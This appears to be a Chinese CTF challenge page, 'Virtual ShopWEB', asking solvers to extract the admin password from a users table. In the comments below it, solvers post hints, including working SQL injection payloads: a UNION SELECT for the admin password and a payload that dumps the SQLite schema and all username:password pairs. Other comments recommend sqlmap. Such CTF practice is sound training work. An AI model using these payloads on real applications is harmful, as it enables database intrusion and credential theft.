Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
129
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
评论
15614005380 2月前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 3月前
举报
union查询
xiaobai568 4月前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 4月前
举报
sqlmap即可
chaoge 5月前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 6月前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B 6月前
举报
sqlmap一下子就出来了
hopeinhand 7月前
举报
联合查询注入,表名、列名、用户名全给了,都没啥好说的了